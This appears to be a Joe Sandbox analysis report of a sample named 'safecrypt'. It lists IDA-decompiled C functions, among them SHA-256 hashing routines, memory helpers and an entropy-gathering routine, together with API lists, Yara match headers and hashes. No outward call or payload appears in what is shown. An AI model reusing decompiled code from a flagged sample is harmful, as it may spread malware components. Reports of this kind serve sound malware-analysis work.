                    0x0042d711
                    0x0042d6ca
                    0x0042d6cd
                    0x00000000
                    0x00000000
                    0x0042d6d1
                    0x0042d6e2
                    0x0042d6e8
                    0x0042d6ea
                    0x0042d6ed
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0042d6ed
                    0x0042d68b
                    0x0042d68e
                    0x0042d690
                    0x0042d695
                    0x0042d695
                    0x00000000
                    0x0042d666
                    0x0042d666
                    0x0042d66b
                    0x0042d66f
                    0x0042d66f
                    0x00000000
                    0x0042d66b
                    0x0042d664

                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042D67E
                    • __isleadbyte_l.LIBCMT ref: 0042D6B1
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00425BCF,?,00000000,00000000,?,?,?,?,00425BCF,00000000), ref: 0042D6E2
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00425BCF,00000001,00000000,00000000,?,?,?,?,00425BCF,00000000), ref: 0042D750
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: 425d53de095f62647028274ab6969f117359ba5a39b3b4bce69eedd4ce8d147e
                    • Instruction ID: 723d65060075842775bd0d3a19ed2c330435f1cc2d12440b06643c8d394e6fac
                    • Opcode Fuzzy Hash: 425d53de095f62647028274ab6969f117359ba5a39b3b4bce69eedd4ce8d147e
                    • Instruction Fuzzy Hash: A031E270F00269EFDF10DF64E884AAE7BA0EF05310F9485AAE4688B2A1D734DD41CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E00420A20(signed int __eax, void* __ecx, intOrPtr _a4) {
                    				intOrPtr _v8;
                    				intOrPtr _t32;
                    				unsigned int _t35;
                    				signed int _t49;
                    				signed int _t51;
                    				intOrPtr _t61;
                    				unsigned int _t66;
                    				void* _t70;
                    				void* _t74;
                    
                    				_push(__ecx);
                    				_t66 = __eax;
                    				_t70 = __ecx;
                    				_t56 = _a4;
                    				_v8 = _a4;
                    				if(__eax == 0) {
                    					L13:
                    					return 1;
                    				} else {
                    					_t32 =  *((intOrPtr*)(__ecx + 0x20));
                    					_t61 = _t32 + __eax * 8;
                    					if(_t61 < _t32) {
                    						 *((intOrPtr*)(__ecx + 0x24)) =  *((intOrPtr*)(__ecx + 0x24)) + 1;
                    					}
                    					 *((intOrPtr*)(_t70 + 0x24)) =  *((intOrPtr*)(_t70 + 0x24)) + (_t66 >> 0x1d);
                    					_t35 =  *(_t70 + 0x68);
                    					 *((intOrPtr*)(_t70 + 0x20)) = _t61;
                    					if(_t35 == 0) {
                    						L8:
                    						_t49 = _t66 >> 6;
                    						if(_t49 != 0) {
                    							E00420DF0(_t70, _v8, _t49);
                    							_t51 = _t49 << 6;
                    							_v8 = _v8 + _t51;
                    							_t74 = _t74 + 8;
                    							_t66 = _t66 - _t51;
                    						}
                    						if(_t66 != 0) {
                    							 *(_t70 + 0x68) = _t66;
                    							E0042E030(_t70 + 0x28, _v8, _t66);
                    						}
                    						goto L13;
                    					} else {
                    						if(_t66 >= 0x40 || _t35 + _t66 >= 0x40) {
                    							E0042E030(_t70 + _t35 + 0x28, _t56, 0x40);
                    							E00420DF0(_t70, _t70 + 0x28, 1);
                    							_v8 = 0x40 + _a4;
                    							_t66 = _t66 - 0x40 - _t35;
                    							 *(_t70 + 0x68) = 0;
                    							E0042C770(_t70 + 0x28, 0, 0x40);
                    							_t74 = _t74 + 0x20;
                    							goto L8;
                    						} else {
                    							E0042E030(_t70 + _t35 + 0x28, _t56, _t66);
                    							 *(_t70 + 0x68) =  *(_t70 + 0x68) + _t66;
                    							return 1;
                    						}
                    					}
                    				}
                    			}












                    0x00420a23
                    0x00420a26
                    0x00420a28
                    0x00420a2a
                    0x00420a2d
                    0x00420a32
                    0x00420afe
                    0x00420b08
                    0x00420a38
                    0x00420a38
                    0x00420a3b
                    0x00420a40
                    0x00420a42
                    0x00420a42
                    0x00420a4a
                    0x00420a4d
                    0x00420a51
                    0x00420a56
                    0x00420ac5
                    0x00420ac7
                    0x00420acc
                    0x00420ad5
                    0x00420ada
                    0x00420add
                    0x00420ae0
                    0x00420ae3
                    0x00420ae3
                    0x00420ae7
                    0x00420aed
                    0x00420af5
                    0x00420afa
                    0x00000000
                    0x00420a58
                    0x00420a5b
                    0x00420a91
                    0x00420a9e
                    0x00420aab
                    0x00420ab4
                    0x00420ab6
                    0x00420abd
                    0x00420ac2
                    0x00000000
                    0x00420a65
                    0x00420a6c
                    0x00420a74
                    0x00420a82
                    0x00420a82
                    0x00420a5b
                    0x00420a56

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memmove$_memset
                    • String ID:
                    • API String ID: 1357608183-0
                    • Opcode ID: 734ecc2d179982feb8d20665ce0804b78eda164305349a80a465f68e8e3f84a1
                    • Instruction ID: 15a7f42b16d9fd045d5e8a29c09042f786c97f827ed3a8ea16cb05c13713ca9b
                    • Opcode Fuzzy Hash: 734ecc2d179982feb8d20665ce0804b78eda164305349a80a465f68e8e3f84a1
                    • Instruction Fuzzy Hash: DE21D6B27107155BD720CA5AE8C0A9BB3E9EB98314F90062FE84987701E675AE45C794
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E00421DF0(signed int __eax, void* __ecx, intOrPtr _a4) {
                    				intOrPtr _v8;
                    				intOrPtr _t32;
                    				unsigned int _t35;
                    				signed int _t50;
                    				signed int _t52;
                    				intOrPtr _t60;
                    				unsigned int _t64;
                    				void* _t68;
                    				void* _t72;
                    
                    				_push(__ecx);
                    				_t64 = __eax;
                    				_t68 = __ecx;
                    				_t57 = _a4;
                    				_v8 = _a4;
                    				if(__eax == 0) {
                    					L13:
                    					return 1;
                    				} else {
                    					_t32 =  *((intOrPtr*)(__ecx + 0x14));
                    					_t60 = _t32 + __eax * 8;
                    					if(_t60 < _t32) {
                    						 *((intOrPtr*)(__ecx + 0x18)) =  *((intOrPtr*)(__ecx + 0x18)) + 1;
                    					}
                    					 *((intOrPtr*)(_t68 + 0x18)) =  *((intOrPtr*)(_t68 + 0x18)) + (_t64 >> 0x1d);
                    					_t35 =  *(_t68 + 0x5c);
                    					 *((intOrPtr*)(_t68 + 0x14)) = _t60;
                    					if(_t35 == 0) {
                    						L8:
                    						_t50 = _t64 >> 6;
                    						if(_t50 != 0) {
                    							E00422030(_v8, _t68, _t50);
                    							_t52 = _t50 << 6;
                    							_v8 = _v8 + _t52;
                    							_t72 = _t72 + 8;
                    							_t64 = _t64 - _t52;
                    						}
                    						if(_t64 != 0) {
                    							 *(_t68 + 0x5c) = _t64;
                    							E0042E030(_t68 + 0x1c, _v8, _t64);
                    						}
                    						goto L13;
                    					} else {
                    						if(_t64 >= 0x40 || _t35 + _t64 >= 0x40) {
                    							E0042E030(_t68 + _t35 + 0x1c, _t57, 0x40);
                    							E00422030(_t68 + 0x1c, _t68, 1);
                    							_v8 = 0x40 + _a4;
                    							_t64 = _t64 - 0x40 - _t35;
                    							 *(_t68 + 0x5c) = 0;
                    							E0042C770(_t68 + 0x1c, 0, 0x40);
                    							_t72 = _t72 + 0x20;
                    							goto L8;
                    						} else {
                    							E0042E030(_t68 + _t35 + 0x1c, _t57, _t64);
                    							 *(_t68 + 0x5c) =  *(_t68 + 0x5c) + _t64;
                    							return 1;
                    						}
                    					}
                    				}
                    			}












                    0x00421df3
                    0x00421df6
                    0x00421df8
                    0x00421dfa
                    0x00421dfd
                    0x00421e02
                    0x00421eca
                    0x00421ed4
                    0x00421e08
                    0x00421e08
                    0x00421e0b
                    0x00421e10
                    0x00421e12
                    0x00421e12
                    0x00421e1a
                    0x00421e1d
                    0x00421e21
                    0x00421e26
                    0x00421e93
                    0x00421e95
                    0x00421e9a
                    0x00421ea1
                    0x00421ea6
                    0x00421ea9
                    0x00421eac
                    0x00421eaf
                    0x00421eaf
                    0x00421eb3
                    0x00421eb9
                    0x00421ec1
                    0x00421ec6
                    0x00000000
                    0x00421e28
                    0x00421e2b
                    0x00421e61
                    0x00421e6c
                    0x00421e79
                    0x00421e82
                    0x00421e84
                    0x00421e8b
                    0x00421e90
                    0x00000000
                    0x00421e35
                    0x00421e3c
                    0x00421e44
                    0x00421e52
                    0x00421e52
                    0x00421e2b
                    0x00421e26

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memmove$_memset
                    • String ID:
                    • API String ID: 1357608183-0
                    • Opcode ID: cb9ce0cab9bbbeafe02c5e783849b871122adabde1c7e9219b9e8f6634ab46ed
                    • Instruction ID: ffa57fb688d28f284f5b8a2691d87fd22a2d99951116dd7e2b5970d7d430d9e1
                    • Opcode Fuzzy Hash: cb9ce0cab9bbbeafe02c5e783849b871122adabde1c7e9219b9e8f6634ab46ed
                    • Instruction Fuzzy Hash: 1921E5B2B10715AFD720CE59EC80F5BB3EDEF94354F41462FE90587201E6B9AE058B94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041D2F0(void* __eax, void* __ecx, intOrPtr _a4) {
                    				intOrPtr _v8;
                    				intOrPtr _t24;
                    				unsigned int _t25;
                    				unsigned int _t40;
                    				void* _t42;
                    				intOrPtr _t47;
                    				signed int _t54;
                    				signed int _t56;
                    				void* _t61;
                    				void* _t65;
                    
                    				_t50 = _a4;
                    				_t61 = __eax;
                    				_t24 =  *((intOrPtr*)(__eax + 0x14));
                    				_t47 = _t24 + 0x100;
                    				_t40 = 0x20;
                    				_v8 = _a4;
                    				if(_t47 < _t24) {
                    					 *((intOrPtr*)(__eax + 0x18)) =  *((intOrPtr*)(__eax + 0x18)) + 1;
                    				}
                    				_t25 =  *(_t61 + 0x5c);
                    				 *((intOrPtr*)(_t61 + 0x14)) = _t47;
                    				if(_t25 == 0) {
                    					L6:
                    					_t54 = _t40 >> 6;
                    					if(_t54 != 0) {
                    						E0041D510(_v8, _t61, _t54);
                    						_t56 = _t54 << 6;
                    						_v8 = _v8 + _t56;
                    						_t65 = _t65 + 8;
                    						_t40 = _t40 - _t56;
                    					}
                    					if(_t40 != 0) {
                    						 *(_t61 + 0x5c) = _t40;
                    						E0042E030(_t61 + 0x1c, _v8, _t40);
                    					}
                    					return 1;
                    				} else {
                    					_t42 = _t61 + 0x1c;
                    					if(_t25 + 0x20 >= 0x40) {
                    						E0042E030(_t25 + _t42, _t50, 0x40);
                    						E0041D510(_t42, _t61, 1);
                    						_v8 = 0x40 + _a4;
                    						_t40 = 0x20 - 0x40 - _t25;
                    						 *(_t61 + 0x5c) = 0;
                    						E0042C770(_t61 + 0x1c, 0, 0x40);
                    						_t65 = _t65 + 0x20;
                    						goto L6;
                    					} else {
                    						E0042E030(_t42 + _t25, _t50, 0x20);
                    						 *(_t61 + 0x5c) =  *(_t61 + 0x5c) + 0x20;
                    						return 1;
                    					}
                    				}
                    			}













                    0x0041d2f4
                    0x0041d2f9
                    0x0041d2fb
                    0x0041d2fe
                    0x0041d305
                    0x0041d30a
                    0x0041d30f
                    0x0041d311
                    0x0041d311
                    0x0041d314
                    0x0041d317
                    0x0041d31c
                    0x0041d389
                    0x0041d38b
                    0x0041d390
                    0x0041d397
                    0x0041d39c
                    0x0041d39f
                    0x0041d3a2
                    0x0041d3a5
                    0x0041d3a5
                    0x0041d3a9
                    0x0041d3af
                    0x0041d3b7
                    0x0041d3bc
                    0x0041d3ca
                    0x0041d31e
                    0x0041d321
                    0x0041d327
                    0x0041d353
                    0x0041d35d
                    0x0041d375
                    0x0041d378
                    0x0041d37a
                    0x0041d381
                    0x0041d386
                    0x00000000
                    0x0041d329
                    0x0041d32f
                    0x0041d337
                    0x0041d346
                    0x0041d346
                    0x0041d327

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memmove$_memset
                    • String ID:
                    • API String ID: 1357608183-0
                    • Opcode ID: ec377b130e888cd561b38ce32847682b1ff8cb7c1c04f26f1eeafb4f59340c5f
                    • Instruction ID: c515fe6990ca87537032bb9f1e22372e091eb035bf9d1419eb509839fa59445c
                    • Opcode Fuzzy Hash: ec377b130e888cd561b38ce32847682b1ff8cb7c1c04f26f1eeafb4f59340c5f
                    • Instruction Fuzzy Hash: AA21EAB2B003156BD720DE5ADC80F9BB3E9EB88358F00056EF90987741D2B99D4587A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 22%
                    			E0041D149(void* __ebx, void* __ebp, void* _a20, char* _a28, char _a68, intOrPtr* _a76, intOrPtr _a80, struct _MEMORYSTATUS _a160, char _a1040, signed int _a2164) {
                    				void* __edi;
                    				intOrPtr* _t18;
                    				intOrPtr _t23;
                    				intOrPtr* _t24;
                    				intOrPtr _t26;
                    				intOrPtr* _t27;
                    				void* _t34;
                    				intOrPtr _t35;
                    				struct HINSTANCE__* _t44;
                    				intOrPtr _t45;
                    				intOrPtr _t46;
                    				signed int _t49;
                    				long long* _t50;
                    				long long* _t52;
                    				long long* _t53;
                    				long long _t62;
                    
                    				_t34 = __ebx;
                    				do {
                    					_t62 =  *0x439ea8;
                    					_t50 = _t49 - 8;
                    					 *_t50 = _t62;
                    					E0041CBC0(_a1040,  &_a1040);
                    					_t43 = _a28;
                    					_t49 = _t50 + 8;
                    					_push( &_a1040);
                    					_push(_a28);
                    				} while (_a80() != 0 && GetTickCount() < _t34);
                    				_t18 = _a76;
                    				if(_t18 == 0) {
                    					_t43 = _a20;
                    					CloseHandle(_a20);
                    				} else {
                    					 *_t18(_a20);
                    				}
                    				FreeLibrary(_t44);
                    				E0041D250(_t62);
                    				GlobalMemoryStatus( &_a160);
                    				_t23 =  *0x460aa8;
                    				if(_t23 == 0) {
                    					_t23 = 0x43e45c;
                    					 *0x460aa8 = 0x43e45c;
                    				}
                    				_t10 = _t23 + 0xc; // 0x41c3e0
                    				_t24 =  *_t10;
                    				if(_t24 != 0) {
                    					asm("fld1");
                    					_t53 = _t49 - 8;
                    					 *_t53 = _t62;
                    					 *_t24( &_a160, 0x20);
                    					_t49 = _t53 + 0x10;
                    				}
                    				_a68 = GetCurrentProcessId();
                    				_t26 =  *0x460aa8;
                    				if(_t26 == 0) {
                    					_t26 = 0x43e45c;
                    					 *0x460aa8 = 0x43e45c;
                    				}
                    				_t13 = _t26 + 0xc; // 0x41c3e0
                    				_t27 =  *_t13;
                    				if(_t27 != 0) {
                    					asm("fld1");
                    					_t52 = _t49 - 8;
                    					 *_t52 = _t62;
                    					_t43 =  &_a68;
                    					 *_t27( &_a68, 4);
                    					_t49 = _t52 + 0x10;
                    				}
                    				_pop(_t45);
                    				_pop(_t46);
                    				_pop(_t35);
                    				return E004256D3(1, _t35, _a2164 ^ _t49, _t43, _t45, _t46);
                    			}



















                    0x0041d149
                    0x0041d150
                    0x0041d150
                    0x0041d15d
                    0x0041d167
                    0x0041d16a
                    0x0041d16f
                    0x0041d173
                    0x0041d17d
                    0x0041d17e
                    0x0041d183
                    0x0041d18d
                    0x0041d193
                    0x0041d19e
                    0x0041d1a3
                    0x0041d195
                    0x0041d19a
                    0x0041d19a
                    0x0041d1aa
                    0x0041d1b0
                    0x0041d1bd
                    0x0041d1c3
                    0x0041d1ca
                    0x0041d1cc
                    0x0041d1d1
                    0x0041d1d1
                    0x0041d1d6
                    0x0041d1d6
                    0x0041d1db
                    0x0041d1dd
                    0x0041d1df
                    0x0041d1e2
                    0x0041d1ef
                    0x0041d1f1
                    0x0041d1f1
                    0x0041d1fa
                    0x0041d1fe
                    0x0041d205
                    0x0041d207
                    0x0041d20c
                    0x0041d20c
                    0x0041d211
                    0x0041d211
                    0x0041d216
                    0x0041d218
                    0x0041d21a
                    0x0041d21d
                    0x0041d220
                    0x0041d227
                    0x0041d229
                    0x0041d229
                    0x0041d233
                    0x0041d234
                    0x0041d235
                    0x0041d245

                    APIs
                    • GetTickCount.KERNEL32 ref: 0041D187
                    • CloseHandle.KERNEL32(?), ref: 0041D1A3
                    • FreeLibrary.KERNEL32(00000000), ref: 0041D1AA
                    • GlobalMemoryStatus.KERNEL32 ref: 0041D1BD
                    • GetCurrentProcessId.KERNEL32 ref: 0041D1F4
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCountCurrentFreeGlobalHandleLibraryMemoryProcessStatusTick
                    • String ID:
                    • API String ID: 3344549487-0
                    • Opcode ID: f14c230c9ccc8a2ccc2d7843bb33b22adb17a32e06f9557670c591d7eb1fae3f
                    • Instruction ID: ba4e17c7f7ac259dc165b9a78ae4b29c1bc9cc1aed2ea462726c5d1746d1710e
                    • Opcode Fuzzy Hash: f14c230c9ccc8a2ccc2d7843bb33b22adb17a32e06f9557670c591d7eb1fae3f
                    • Instruction Fuzzy Hash: 7B2151706043409FD724EFA5DC85BABB7E4AB84700F04892DE598C7290EBB8D494CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 66%
                    			E00414520(signed int __eax, void* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				signed int _v28;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t61;
                    				intOrPtr _t63;
                    				intOrPtr _t67;
                    				intOrPtr _t68;
                    				intOrPtr* _t71;
                    				intOrPtr* _t73;
                    				intOrPtr _t78;
                    				void* _t80;
                    				intOrPtr* _t82;
                    				void* _t84;
                    				signed int _t87;
                    				signed int _t88;
                    				void* _t92;
                    				intOrPtr* _t93;
                    				void* _t95;
                    				void* _t98;
                    				void* _t100;
                    				void* _t103;
                    				signed int _t114;
                    				signed int _t115;
                    				signed int _t130;
                    				signed int _t132;
                    				signed int _t135;
                    				signed int _t138;
                    				void* _t140;
                    
                    				_t104 = __ecx;
                    				_t140 = (_t138 & 0xfffffff8) - 0x1c;
                    				_t61 = __eax | 0xffffffff;
                    				_v20 = _t61;
                    				_v28 = 0;
                    				if(_a8 > 0x7fffffff) {
                    					L38:
                    					return _t61;
                    				}
                    				_t103 = E0040BB10();
                    				if(_t103 == 0) {
                    					L37:
                    					_t61 = _v20;
                    					goto L38;
                    				} else {
                    					_t63 =  *((intOrPtr*)(_t103 + 0x24));
                    					if(_t63 != 0 ||  *((intOrPtr*)(_t103 + 0x28)) != _t63) {
                    						 *((intOrPtr*)(_t103 + 0x24)) = _t63 + 1;
                    					} else {
                    						_t7 = _t103 + 0x14; // 0x14
                    						_t100 = E0040BCF0(__ecx, _t7,  *(_t103 + 0x20));
                    						_t140 = _t140 + 4;
                    						if(_t100 == 0) {
                    							 *((intOrPtr*)(_t103 + 0x24)) =  *((intOrPtr*)(_t103 + 0x24)) + 1;
                    						}
                    					}
                    					_v24 = E0040BC90(_t103);
                    					_v8 = E0040BC90(_t103);
                    					_t67 = _a16;
                    					_t124 =  *(_t67 + 0xc);
                    					if(_t124 == 0) {
                    						L27:
                    						_t68 =  *((intOrPtr*)(_t103 + 0x24));
                    						if(_t68 == 0) {
                    							 *(_t103 + 0x18) =  *(_t103 + 0x18) - 1;
                    							_t124 =  *( *((intOrPtr*)(_t103 + 0x14)) +  *(_t103 + 0x18) * 4);
                    							_t112 =  *(_t103 + 0x20);
                    							if(_t124 <  *(_t103 + 0x20)) {
                    								E0040BF40(_t112 - _t124, _t103);
                    							}
                    							 *(_t103 + 0x20) = _t124;
                    							 *((intOrPtr*)(_t103 + 0x28)) = 0;
                    						} else {
                    							 *((intOrPtr*)(_t103 + 0x24)) = _t68 - 1;
                    						}
                    						E0040BBA0(_t124, _t103);
                    						_t130 = _v28;
                    						if(_t130 != 0) {
                    							_t71 =  *0x48048c;
                    							if(_t71 != 0) {
                    								 *_t71(_t130, 0);
                    								_t140 = _t140 + 8;
                    							}
                    							 *0x43def4(_t130);
                    							_t73 =  *0x48048c;
                    							if(_t73 != 0) {
                    								 *_t73(0, 1);
                    							}
                    						}
                    						goto L37;
                    					}
                    					_t132 =  *(_t67 + 4);
                    					_v16 = _t132;
                    					_t78 = E00419760(_t132);
                    					_t140 = _t140 + 4;
                    					_v12 = _t78;
                    					if(_t78 == 0) {
                    						goto L27;
                    					}
                    					_t114 = _t124;
                    					_t124 = 0;
                    					_t80 = E00419AA0(_a12, _t104, _t114, 0, _t132, _t78, _t103);
                    					_t140 = _t140 + 0xc;
                    					if(_t80 == 0) {
                    						L26:
                    						E00419810(_v12);
                    						goto L27;
                    					}
                    					if( *((intOrPtr*)( *_t132 + 4)) != 0x196) {
                    						L13:
                    						_t82 =  *((intOrPtr*)( *_t132 + 0x20));
                    						if(_t82 != 0) {
                    							_t82 =  *_t82(_t132);
                    							_t140 = _t140 + 4;
                    						}
                    						asm("cdq");
                    						_t115 = _t114 & 0x00000007;
                    						_t135 = _t115 + _t82 + 7 >> 3;
                    						_t84 = E0040D3A0(_v24);
                    						asm("cdq");
                    						_t87 = _t84 + 7 + (_t115 & 0x00000007) >> 3;
                    						_v16 = _t87;
                    						if(_t87 <= _t135) {
                    							if(_t135 > 0) {
                    								_t124 = 0x460a3e;
                    								_t88 = E00423310(0x460a3e, _t135, 0x460a3f);
                    								_t140 = _t140 + 8;
                    								_v28 = _t88;
                    								if(_t88 != 0) {
                    									_t124 = _t135 - _v16;
                    									E0042C770(_t88, 0, _t135 - _v16);
                    									_t92 = E0040D950(_v28 + _t135 - _v16, _v24, _v24);
                    									_t140 = _t140 + 0x10;
                    									if(_v16 == _t92) {
                    										_t93 = _a20;
                    										if(_t93 == 0) {
                    											_t124 = _a8;
                    											if(_t124 > _t135) {
                    												_t124 = _t135;
                    												_a8 = _t124;
                    											}
                    											E0042E030(_a4, _v28, _t124);
                    											_t140 = _t140 + 0xc;
                    											_v20 = _t124;
                    										} else {
                    											_t95 =  *_t93(_v28, _t135, _a4,  &_a8);
                    											_t140 = _t140 + 0x10;
                    											if(_t95 != 0) {
                    												_v20 = _a8;
                    											}
                    										}
                    									}
                    								}
                    							} else {
                    								_v28 = _t124;
                    							}
                    						}
                    						goto L26;
                    					}
                    					_t114 = _v16;
                    					_t98 = E00419920(_t114, _v12, _v24, _v8, _t103);
                    					_t140 = _t140 + 0xc;
                    					if(_t98 == 0) {
                    						goto L26;
                    					} else {
                    						_t132 = _v16;
                    						goto L13;
                    					}
                    				}
                    			}




































                    0x00414520
                    0x00414526
                    0x0041452a
                    0x00414536
                    0x0041453a
                    0x00414542
                    0x00414760
                    0x00414766
                    0x00414766
                    0x0041454d
                    0x00414551
                    0x0041475c
                    0x0041475c
                    0x00000000
                    0x00414557
                    0x00414557
                    0x0041455c
                    0x0041457c
                    0x00414563
                    0x00414566
                    0x0041456a
                    0x0041456f
                    0x00414574
                    0x00414576
                    0x00414576
                    0x00414574
                    0x00414586
                    0x0041458f
                    0x00414593
                    0x00414596
                    0x0041459b
                    0x004146ed
                    0x004146ed
                    0x004146f2
                    0x004146fa
                    0x00414703
                    0x00414706
                    0x0041470b
                    0x00414711
                    0x00414711
                    0x00414716
                    0x00414719
                    0x004146f4
                    0x004146f5
                    0x004146f5
                    0x00414722
                    0x00414727
                    0x0041472d
                    0x0041472f
                    0x00414736
                    0x0041473b
                    0x0041473d
                    0x0041473d
                    0x00414741
                    0x00414747
                    0x00414751
                    0x00414757
                    0x00414759
                    0x00414751
                    0x00000000
                    0x0041472d
                    0x004145a1
                    0x004145a5
                    0x004145a9
                    0x004145ae
                    0x004145b1
                    0x004145b7
                    0x00000000
                    0x00000000
                    0x004145c2
                    0x004145c5
                    0x004145c7
                    0x004145cc
                    0x004145d1
                    0x004146e4
                    0x004146e8
                    0x00000000
                    0x004146e8
                    0x004145e0
                    0x00414609
                    0x0041460b
                    0x00414610
                    0x00414613
                    0x00414615
                    0x00414615
                    0x0041461f
                    0x00414620
                    0x00414626
                    0x00414629
                    0x00414631
                    0x00414637
                    0x0041463a
                    0x00414640
                    0x00414648
                    0x00414659
                    0x0041465e
                    0x00414663
                    0x00414666
                    0x0041466c
                    0x00414670
                    0x0041467a
                    0x0041468d
                    0x00414692
                    0x00414699
                    0x0041469b
                    0x004146a0
                    0x004146c2
                    0x004146c7
                    0x004146c9
                    0x004146cb
                    0x004146cb
                    0x004146d8
                    0x004146dd
                    0x004146e0
                    0x004146a2
                    0x004146b0
                    0x004146b2
                    0x004146b7
                    0x004146bc
                    0x004146bc
                    0x004146b7
                    0x004146a0
                    0x00414699
                    0x0041464a
                    0x0041464a
                    0x0041464a
                    0x00414648
                    0x00000000
                    0x00414640
                    0x004145f0
                    0x004145f5
                    0x004145fa
                    0x004145ff
                    0x00000000
                    0x00414605
                    0x00414605
                    0x00000000
                    0x00414605
                    0x004145ff

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memmove_memset
                    • String ID: >F
                    • API String ID: 3555123492-3034848679
                    • Opcode ID: 1e6c59de961fb395a59345e686be5d814ce06bb1ff0872b7afe9e3d4a26e85f7
                    • Instruction ID: 38e41979de80e12f217b0ca997a06e69b4c1d38a8df81b1616e366d242e29da9
                    • Opcode Fuzzy Hash: 1e6c59de961fb395a59345e686be5d814ce06bb1ff0872b7afe9e3d4a26e85f7
                    • Instruction Fuzzy Hash: B261C3B5A002019BCB10DF25C841A9B77E5AFD5318F14452EFC58AB346E738ED45CBEA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E00420970(intOrPtr __ebx, void* __ecx, intOrPtr __edx, signed int _a4) {
                    				signed int _v8;
                    				intOrPtr _v16;
                    				intOrPtr _v96;
                    				intOrPtr _v100;
                    				intOrPtr _v104;
                    				intOrPtr _v108;
                    				intOrPtr _v112;
                    				intOrPtr _v116;
                    				intOrPtr _v120;
                    				char _v124;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t16;
                    				intOrPtr _t26;
                    				void* _t33;
                    				intOrPtr _t35;
                    				intOrPtr _t37;
                    				intOrPtr _t38;
                    				signed int _t39;
                    
                    				_t31 = __edx;
                    				_t26 = __ebx;
                    				_t41 = (_t39 & 0xfffffff8) - 0x78;
                    				_t16 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t16 ^ (_t39 & 0xfffffff8) - 0x00000078;
                    				_t37 = __edx;
                    				_t33 = __ecx;
                    				if(__edx == 0) {
                    					_t37 = 0x43fe20;
                    				}
                    				E0042C770( &_v124, 0, 0x70);
                    				_v124 = 0x6a09e667;
                    				_v120 = 0xbb67ae85;
                    				_v116 = 0x3c6ef372;
                    				_v112 = 0xa54ff53a;
                    				_v108 = 0x510e527f;
                    				_v104 = 0x9b05688c;
                    				_v100 = 0x1f83d9ab;
                    				_v96 = 0x5be0cd19;
                    				_v16 = 0x20;
                    				E00420A20(_a4,  &_v124, _t33);
                    				E00420B10(_t37,  &_v124,  &_v124);
                    				_pop(_t35);
                    				_pop(_t38);
                    				return E004256D3(_t37, _t26, _v8 ^ _t41 + 0x00000010, _t31, _t35, _t38);
                    			}






















                    0x00420970
                    0x00420970
                    0x00420976
                    0x00420979
                    0x00420980
                    0x00420985
                    0x00420988
                    0x0042098c
                    0x0042098e
                    0x0042098e
                    0x0042099c
                    0x004209a9
                    0x004209b1
                    0x004209b9
                    0x004209c1
                    0x004209c9
                    0x004209d1
                    0x004209d9
                    0x004209e1
                    0x004209e9
                    0x004209f4
                    0x00420a02
                    0x00420a0b
                    0x00420a0e
                    0x00420a19

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset
                    • String ID: $gj
                    • API String ID: 2102423945-3974221788
